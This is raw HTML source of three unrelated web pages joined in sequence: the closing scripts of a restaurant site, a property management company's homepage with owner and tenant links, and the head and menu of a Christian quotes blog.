src='https://maialinonyc.com/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://maialinonyc.com/wp-content/plugins/restaurantmenu/js/show.js?ver=2.0'></script> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> <!-- BugHerd --> <script type='text/javascript'> (function (d, t) { var bh = d.createElement(t), s = d.getElementsByTagName(t)[0]; bh.type = 'text/javascript'; bh.src = '//www.bugherd.com/sidebarv2.js?apikey=jbjvxum7pjthqxxeqjg10q'; s.parentNode.insertBefore(bh, s); })(document, 'script'); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-48514200-4', 'maialinonyc.com'); ga('send', 'pageview'); </script> <!--[if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif]--> </body> </html>
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Home | Premier</title> <link rel="stylesheet" href="http://www.rentwithpremier.com/wp-content/themes/ppm/style.css" type="text/css" media="screen" /> <!--[if IE 6]><link rel="stylesheet" href="http://www.rentwithpremier.com/wp-content/themes/ppm/style.ie6.css" type="text/css" media="screen" /><![endif]--> <!--[if IE 7]><link rel="stylesheet" href="http://www.rentwithpremier.com/wp-content/themes/ppm/style.ie7.css" type="text/css" media="screen" /><![endif]--> <link rel="pingback" href="http://www.rentwithpremier.com/xmlrpc.php" /> <link rel='dns-prefetch' href='//dev.pboss.us' /> <link rel='dns-prefetch' href='//netdna.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Premier &raquo; Feed" href="http://www.rentwithpremier.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Premier &raquo; Comments Feed" href="http://www.rentwithpremier.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Premier &raquo; Home Comments Feed" href="http://www.rentwithpremier.com/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.rentwithpremier.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='jquery.accordion-css' href='http://dev.pboss.us/premier/wp-content/plugins/accordion/accordion-1.8.5.css?ver=1.8.5' type='text/css' media='all' /> <link rel='stylesheet' id='NextGEN-css' href='http://www.rentwithpremier.com/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0' type='text/css' media='screen' /> <link rel='stylesheet' id='shutter-css' href='http://www.rentwithpremier.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.4' type='text/css' media='screen' /> <link rel='stylesheet' id='wp-block-library-css' href='http://www.rentwithpremier.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='pbsh-plugin-css' href='http://www.rentwithpremier.com/wp-content/plugins/pbSearchHomes/css/pb-prop.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='prefix-font-awesome-css' href='//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css?ver=4.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='fancybox-css' href='http://www.rentwithpremier.com/wp-content/plugins/pbSearchHomes/fancybox/source/jquery.fancybox.css?v=2.1.5&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='fancybox-thumbs-css' href='http://www.rentwithpremier.com/wp-content/plugins/pbSearchHomes/fancybox/source/helpers/jquery.fancybox-thumbs.css?v=1.0.7&#038;ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.2.js?ver=1.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var shutterSettings = {"msgLoading":"L O A D I N G","msgClose":"Click to Close","imageCount":"1"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3'></script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995'></script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06'></script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-content/plugins/pbSearchHomes/fancybox/source/jquery.fancybox.pack.js?v=2.1.5&#038;ver=5.1.1'></script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-content/plugins/pbSearchHomes/fancybox/source/helpers/jquery.fancybox-media.js?v=1.0.6&#038;ver=5.1.1'></script> <link rel='https://api.w.org/' href='http://www.rentwithpremier.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.rentwithpremier.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.rentwithpremier.com/wp-includes/wlwmanifest.xml" /> <link rel="canonical" href="http://www.rentwithpremier.com/" /> <link rel='shortlink' href='http://www.rentwithpremier.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.rentwithpremier.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.rentwithpremier.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.rentwithpremier.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.rentwithpremier.com%2F&#038;format=xml" /> <!-- <meta name="NextGEN" version="1.9.3" /> --> <link rel="stylesheet" type="text/css" media="screen" href="http://dev.pboss.us/premier/wp-content/plugins/wp-google-weather/wp-google-weather.css"/><script type="text/javascript" src="http://www.rentwithpremier.com/wp-content/themes/ppm/script.js"></script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-89761504-10', 'auto'); ga('send', 'pageview'); </script> </head> <body class="home page-template page-template-onecolumn-page page-template-onecolumn-page-php page page-id-27"> <div id="art-page-background-simple-gradient"> <div id="art-page-background-gradient"></div> </div> <div id="art-main"> <div class="art-sheet"> <div class="art-sheet-cc"></div> <div class="art-sheet-body"> <div class="art-header"> <div class="art-header-jpeg"></div> </div> <div class="art-nav"> <div class="l"></div> <div class="r"></div> <ul class="art-menu"> <li class="active" ><a href="http://www.rentwithpremier.com/" class="active"><span class='l'></span><span class='r'></span><span class='t'>Home</span></a></li> <li><a href="http://www.rentwithpremier.com/rentals/"><span class='l'></span><span class='r'></span><span class='t'>Available</span></a></li> <li><a href="http://www.rentwithpremier.com/application-process/download-application/"><span class='l'></span><span class='r'></span><span class='t'>Application</span></a></li> <li><a href="http://www.rentwithpremier.com/tenants/"><span class='l'></span><span class='r'></span><span class='t'>Tenants</span></a> <ul> <li><a href="http://www.rentwithpremier.com/tenants/maintenance-requests/">Maintenance Requests</a></li> <li><a href="http://www.rentwithpremier.com/tenants/faqs/">FAQ&#8217;s</a></li> <li><a href="http://www.rentwithpremier.com/tenants/lease/">Ending Lease</a></li> </ul> </li> <li><a href="http://www.rentwithpremier.com/landlords/"><span class='l'></span><span class='r'></span><span class='t'>Landlords</span></a></li> <li><a href="http://www.rentwithpremier.com/commercial/"><span class='l'></span><span class='r'></span><span class='t'>Commercial</span></a></li> <li><a href="http://www.rentwithpremier.com/about/"><span class='l'></span><span class='r'></span><span class='t'>About</span></a></li> <li><a href="http://www.rentwithpremier.com/contact/"><span class='l'></span><span class='r'></span><span class='t'>Contact Us</span></a></li> </ul> </div> <div class="art-content-layout"> <div class="art-content-layout-row"> <div class="art-layout-cell art-content"> <div class="art-post"> <div class="art-post-body"> <div class="art-post-inner art-article post-27 page type-page status-publish hentry" id="post-27"> <div class="art-postcontent"> <!-- article-content --> <table style="border-collapse: collapse" width="100%" border="0" cellpadding="0"> <tbody> <tr> <td style="border-color: #ffffff;border-style: solid;border-width: 0px" dir="" scope="" align="" valign=""> <h3>Owners</h3> <p><a href="http://www.rentwithpremier.com/landlords/"><br /> <img src="http://www.rentwithpremier.com/files/2013/03/landlord-2.jpg" alt="" border="0" width="280" /></a></td> <td style="border-color: #ffffff;border-style: solid;border-width: 0px" dir="" scope="" align="" valign=""> <h3>Tenants</h3> <p><a href="http://www.rentwithpremier.com/tenants/"><br /> <img src="http://www.rentwithpremier.com/files/2013/03/boxes-2.jpg" alt="" border="0" width="280" /></a></td> <td style="border-color: #ffffff;border-style: solid;border-width: 0px" dir="" scope="" align="" valign=""> <h3>Commercial</h3> <p><a href="http://www.rentwithpremier.com/commercial/"><br /> <img src="http://www.rentwithpremier.com/files/2013/03/comm-1.jpg" alt="" border="0" width="280" /></a></td> </tr> <tr> <td style="border-color: #ffffff;border-style: solid;border-width: 0px" dir="" scope="" align="" valign=""><a href="http://owner.PREMIER_83511.propertyboss.net"><img src="http://www.rentwithpremier.com/files/2018/03/ownerlogin.jpg" alt="" border="0" /></a></td> <td style="border-color: #ffffff;border-style: solid;border-width: 0px" dir="" scope="" align="" valign=""><a href="http://resident.PREMIER_83511.propertyboss.net"><img src="http://www.rentwithpremier.com/files/2018/03/residenlogin.jpg" alt="" border="0" width="280" /></a></td> <td style="border-color: #ffffff;border-style: solid;border-width: 0px" dir="" scope="" align="" valign=""></td> </tr> </tbody> </table> <p></p> <!-- /article-content --> </div> <div class="cleared"></div> </div> <div class="cleared"></div> </div> </div> </div> </div> </div> <div class="cleared"></div><div class="art-footer"> <div class="art-footer-t"></div> <div class="art-footer-body"> <div class="art-footer-text"> © 2012 Premier Property Management Services | Powered by <a href="http://www.propertyboss.com/" target="_blank">PropertyBoss Solutions Web Services</a>. </div> <div class="cleared"></div> </div> </div> <div class="cleared"></div> </div> </div> <div class="cleared"></div> <p class="art-page-footer">Powered by <a href="http://wordpress.org/">WordPress</a> and <a href="http://www.artisteer.com/?p=wordpress_themes">WordPress Theme</a> created with Artisteer.</p> </div> <div id="wp-footer"> <div id="su-footer-links" style="text-align: center;"></div><script type='text/javascript' src='http://dev.pboss.us/premier/wp-content/plugins/accordion/jquery-1.8.5.js?ver=1.8.5'></script> <script type='text/javascript' src='http://dev.pboss.us/premier/wp-content/plugins/accordion/accordion.js?ver=5.1.1'></script> <script type='text/javascript' src='http://www.rentwithpremier.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <!-- 63 queries. 0.165 seconds. --> </div> </body> </html>
0
<!DOCTYPE html> <!--[if IE 7]> <html id="ie7" lang="en"> <![endif]--> <!--[if IE 8]> <html id="ie8" lang="en"> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html lang="en"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width" /> <title>Jesus Quotes and God Thoughts | “God’s wisdom is something mysterious that goes deep into the interior of his purposes.” ~Apostle Paul</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://quotesthoughtsrandom.wordpress.com/xmlrpc.php" /> <!--[if lt IE 9]> <script src="https://s2.wp.com/wp-content/themes/pub/chateau/js/html5.js" type="text/javascript"></script> <![endif]--> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//s1.wp.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//s.pubmine.com' /> <link rel='dns-prefetch' href='//x.bidswitch.net' /> <link rel='dns-prefetch' href='//static.criteo.net' /> <link rel='dns-prefetch' href='//ib.adnxs.com' /> <link rel='dns-prefetch' href='//aax.amazon-adsystem.com' /> <link rel='dns-prefetch' href='//bidder.criteo.com' /> <link rel='dns-prefetch' href='//cas.criteo.com' /> <link rel='dns-prefetch' href='//gum.criteo.com' /> <link rel='dns-prefetch' href='//ads.pubmatic.com' /> <link rel='dns-prefetch' href='//gads.pubmatic.com' /> <link rel='dns-prefetch' href='//tpc.googlesyndication.com' /> <link rel='dns-prefetch' href='//ad.doubleclick.net' /> <link rel='dns-prefetch' href='//googleads.g.doubleclick.net' /> <link rel='dns-prefetch' href='//www.googletagservices.com' /> <link rel='dns-prefetch' href='//cdn.switchadhub.com' /> <link rel='dns-prefetch' href='//delivery.g.switchadhub.com' /> <link rel='dns-prefetch' href='//delivery.swid.switchadhub.com' /> <link rel="alternate" type="application/rss+xml" title="Jesus Quotes and God Thoughts &raquo; Feed" href="https://quotesthoughtsrandom.wordpress.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Jesus Quotes and God Thoughts &raquo; Comments Feed" href="https://quotesthoughtsrandom.wordpress.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function () { oldonload(); func(); } } } /* ]]> */ </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s1.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1556893897h&ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/_static/??-eJyNUtlSwzAM/CFc00LpE8O3+BCOGl9j2WTy9ygpvUgn0xfPStrVyrLlkIVJsUKsMjSRfXMYSQ7ZpCAooIfxX7QxRC/yRqZ9cldhKlZZks4nrfxzXNOpCqqJn92CfzOSxx5IHqFmZXoxRxc6RuOb5TInpEWajWaWLqqMkuroYRMwrhmYVIDzIas6MQJYVOAhMG1NFvLHWTXBjqdb7mixWq1zASLBZ8AWRO3YaKk7pWVu+rylv7s8QeSlnMhitlydCa2DSrKmLHIiRo9dHkigcTX1CMKrQVYI2bP9XQOUMVXkHnQBa50dJMGvpyqmeBeIb6+wrEkLTB+MoZt/wjWcRF/hc7vfH3bv28Pb6/EXRCQeNA==?cssminify=yes' type='text/css' media='all' /> <link rel='stylesheet' id='print-css-1-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&cssminify=yes' type='text/css' media='print' /> <link rel='stylesheet' id='all-css-2-1' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/actionbar/actionbar.css,/wp-content/themes/h4/global.css?m=1516985148j&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyFztEKwjAMBdAfsiu6Dp/Eb6k1jtQlrU3q0K+3A30QhkLgPtwDN3bOBjlM9QxiY7tbhfJ4RxdlY38BQzgWr9AR8geHxAqsi81JlEDEj7DSUjrhBKYKlAZY28wlrbjvl5DvCPNfFkGzD1dTQPC5rB/psB0Gt+v7vXPxBTjQW9A='></script> <link rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1530132353h&cssminify=yes' type='text/css' media='all' /> <!--[if lt IE 8]> <link rel='stylesheet' id='highlander-comments-ie7-css' href='https://s2.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1351637563h&#038;ver=20110606' type='text/css' media='all' /> <![endif]--> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://quotesthoughtsrandom.wordpress.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress.com" /> <link rel='shortlink' href='https://wp.me/4nxHy' /> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="Jesus Quotes and God Thoughts" /> <meta property="og:description" content="“God’s wisdom is something mysterious that goes deep into the interior of his purposes.” ~Apostle Paul" /> <meta property="og:url" content="https://quotesthoughtsrandom.wordpress.com/" /> <meta property="og:site_name" content="Jesus Quotes and God Thoughts" /> <meta property="og:image" content="https://secure.gravatar.com/blavatar/82948be88b6d3526d64d5a35cd6e39ad?s=200&amp;ts=1558023228" /> <meta property="og:image:width" content="200" /> <meta property="og:image:height" content="200" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:creator" content="@MWWatHome" /> <meta name="twitter:site" content="@MWWatHome" /> <meta property="fb:app_id" content="249643311490" /> <!-- End Jetpack Open Graph Tags --> <link rel="shortcut icon" type="image/x-icon" href="https://secure.gravatar.com/blavatar/82948be88b6d3526d64d5a35cd6e39ad?s=32" sizes="16x16" /> <link rel="icon" type="image/x-icon" href="https://secure.gravatar.com/blavatar/82948be88b6d3526d64d5a35cd6e39ad?s=32" sizes="16x16" /> <link rel="apple-touch-icon-precomposed" href="https://secure.gravatar.com/blavatar/82948be88b6d3526d64d5a35cd6e39ad?s=114" /> <link rel='openid.server' href='https://quotesthoughtsrandom.wordpress.com/?openidserver=1' /> <link rel='openid.delegate' href='https://quotesthoughtsrandom.wordpress.com/' /> <link rel="search" type="application/opensearchdescription+xml" href="https://quotesthoughtsrandom.wordpress.com/osd.xml" title="Jesus Quotes and God Thoughts" /> <link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /> <style type="text/css"> .recentcomments a { display: inline !important; padding: 0 !important; margin: 0 !important; } table.recentcommentsavatartop img.avatar, table.recentcommentsavatarend img.avatar { border: 0px; margin: 0; } table.recentcommentsavatartop a, table.recentcommentsavatarend a { border: 0px !important; background-color: transparent !important; } td.recentcommentsavatarend, td.recentcommentsavatartop { padding: 0px 0px 1px 0px; margin: 0px; } td.recentcommentstextend { border: none !important; padding: 0px 0px 2px 10px; } .rtl td.recentcommentstextend { padding: 0px 10px 2px 0px; } td.recentcommentstexttop { border: none; padding: 0px 0px 0px 10px; } .rtl td.recentcommentstexttop { padding: 0px 10px 0px 0px; } </style> <meta name="application-name" content="Jesus Quotes and God Thoughts" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-tooltip" content="“God’s wisdom is something mysterious that goes deep into the interior of his purposes.” ~Apostle Paul" /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://quotesthoughtsrandom.wordpress.com/feed/;icon-uri=https://secure.gravatar.com/blavatar/82948be88b6d3526d64d5a35cd6e39ad?s=16" /><meta name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="description" content="“God’s wisdom is something mysterious that goes deep into the interior of his purposes.” ~Apostle Paul" /> <script type="text/javascript"> function __ATA_CC() {var v = document.cookie.match('(^|;) ?personalized-ads-consent=([^;]*)(;|$)');return v ? 1 : 0;} var __ATA_PP = { pt: 0, ht: 0, tn: 'chateau', amp: false, siteid: 8982, blogid: 64716440, consent: __ATA_CC() }; var __ATA = __ATA || {}; __ATA.cmd = __ATA.cmd || []; __ATA.criteo = __ATA.criteo || {}; __ATA.criteo.cmd = __ATA.criteo.cmd || []; </script> <script type="text/javascript" src="//s.pubmine.com/head.js" async></script><style type="text/css" id="syntaxhighlighteranchor"></style> <script type="text/javascript"> window.google_analytics_uacct = "UA-52447-2"; </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-52447-2']); _gaq.push(['_setDomainName', 'wordpress.com']); _gaq.push(['_initData']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); </script> </head> <body class="home blog mp6 customizer-styles-applied two-column sidebar-content highlander-enabled highlander-light"> <div id="page" class="hfeed"> <div id="page-inner"> <header id="branding" role="banner"> <nav id="menu" role="navigation"> <ul id="menu-menu-1" class="menu clear-fix"><li id="menu-item-423" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-423"><a href="https://quotesthoughtsrandom.wordpress.com/" aria-current="page">Home</a></li> <li id="menu-item-424" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-424"><a href="https://quotesthoughtsrandom.wordpress.com/about/">About</a> <ul class="sub-menu"> <li id="menu-item-15777" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15777"><a href="https://quotesthoughtsrandom.wordpress.com/about/blogs-i-maintain/">Blogs I maintain</a></li> <li id="menu-item-14873" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14873"><a href="https://quotesthoughtsrandom.wordpress.com/about/starting-the-journey-to-be-a-disciple-of-jesus/">Starting the journey to be a disciple of Jesus.</a></li> <li id="menu-item-14805" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14805"><a href="https://quotesthoughtsrandom.wordpress.com/about/how-can-i-help-you-do-you-have-questions/">How can I help you? Do you have questions?</a></li> </ul> </li> <li id="menu-item-429" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-429"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/">God Thoughts</a> <ul class="sub-menu"> <li id="menu-item-576" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-576"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/god-is-great/">God is Great</a></li> <li id="menu-item-577" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-577"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/god-is-good/">God is Good</a></li> <li id="menu-item-8111" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8111"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/god-is-god/">God is God</a></li> <li id="menu-item-549" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-549"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/gods-goal/">God&#8217;s Goal</a></li> <li id="menu-item-550" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-550"><a href="https://quotesthoughtsrandom.wordpress.com/category/god-thoughts/digital-ministry/">Digital Ministry</a></li> </ul> </li> <li id="menu-item-425" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-425"><a href="https://quotesthoughtsrandom.wordpress.com/category/quotes/">Quotes</a> <ul class="sub-menu"> <li id="menu-item-7826" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7826"><a href="https://quotesthoughtsrandom.wordpress.com/?s=leadership">Leadership</a></li> <li id="menu-item-13847" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13847"><a href="https://quotesthoughtsrandom.wordpress.com/tag/martin-luther-king-jr/">MLK Quotes</a></li> </ul> </li> <li id="menu-item-8219" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8219"><a href="https://quotesthoughtsrandom.wordpress.com/tag/jesus-sayings/">Jesus Sayings</a></li> <li id="menu-item-11619" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-11619"><a href="https://quotesthoughtsrandom.wordpress.com/additional-resources-you-may-be-interested-in/">Resources</a> <ul class="sub-menu"> <li id="menu-item-13181" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13181"><a href="https://quotesthoughtsrandom.wordpress.com/additional-resources-you-may-be-interested-in/slave-or-servant/">Slave or Servant</a></li> <li id="menu-item-13037" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13037"><a href="https://quotesthoughtsrandom.wordpress.com/additional-resources-you-may-be-interested-in/its-greek-to-me/">It&#8217;s Greek to me</a></li> <li id="menu-item-11921" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11921"><a href="https://quotesthoughtsrandom.wordpress.com/additional-resources-you-may-be-interested-in/good-news-book-of-matthew/">Matthew &#8211; a &#8220;Good News&#8221; book</a></li> <li id="menu-item-11932" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11932"><a 